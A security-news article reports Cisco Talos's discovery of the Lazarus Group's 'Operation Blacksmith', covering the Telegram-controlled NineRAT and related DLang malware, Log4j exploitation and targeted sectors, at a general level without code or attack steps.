Telegram Trojan: Lazarus Leverages NineRAT in Operation Blacksmith
In the ever-evolving landscape of cyber threats, the Lazarus Group stands as a formidable name, notorious for its sophisticated attacks and elusive tactics. Recently, Cisco Talos discovered their new campaign, dubbed “Operation Blacksmith,” has made headlines, showcasing their unrelenting pursuit of cyber dominance.
“Operation Blacksmith” is an intricate campaign employing at least three novel DLang-based malware families, two of which are remote access trojans (RATs). The most intriguing aspect is the use of Telegram bots and channels for command and control communications, with the Telegram-based RAT named “NineRAT.” This innovative approach demonstrates Lazarus Group’s aptitude in leveraging legitimate services to evade detection.
Typical Infection chain observed in Operation Blacksmith | Image: Cisco Talos
Lazarus Group’s evolution in tactics is indicative of the strategic shifts in the cyber espionage landscape. As a North Korean APT group, they’ve been linked to the Onyx Sleet subgroup, sharing tactics, techniques, and procedures. This alliance highlights the complex nature of state-sponsored cyber operations, where subgroups support varied objectives from politics to national security.
The group’s targets span the globe, from manufacturing to agriculture, exploiting vulnerabilities like CVE-2021-44228 (Log4j). This opportunistic approach, targeting enterprises with exposed infrastructure, shows their adaptability and relentless pursuit of exploitable weaknesses.
NineRAT, a key tool in this campaign, was first built in May 2022 and deployed against a South American agricultural organization in March 2023. It signifies a shift towards using non-traditional frameworks for malware development. Alongside NineRAT, other tools like “DLRAT” and “BottomLoader” add to their arsenal, each serving distinct malicious purposes.
Using Telegram as a C2 channel is a cunning move by Lazarus, aiming to blend in with legitimate traffic to evade network and host-based detection. This method exemplifies the group’s innovative approach to maintaining stealth in their operations.
Operation Blacksmith is a testament to Lazarus Group’s growing sophistication and adaptability. Their ability to use novel methods and tools poses a significant challenge for cybersecurity defenses worldwide. As they continue to evolve, the cybersecurity community must remain vigilant and innovative to counter such advanced threats.
The Lazarus Group’s Operation Blacksmith is more than just a series of cyberattacks; it’s a wake-up call for organizations globally. It highlights the need for robust cybersecurity measures and continuous monitoring to defend against such advanced and evolving threats.
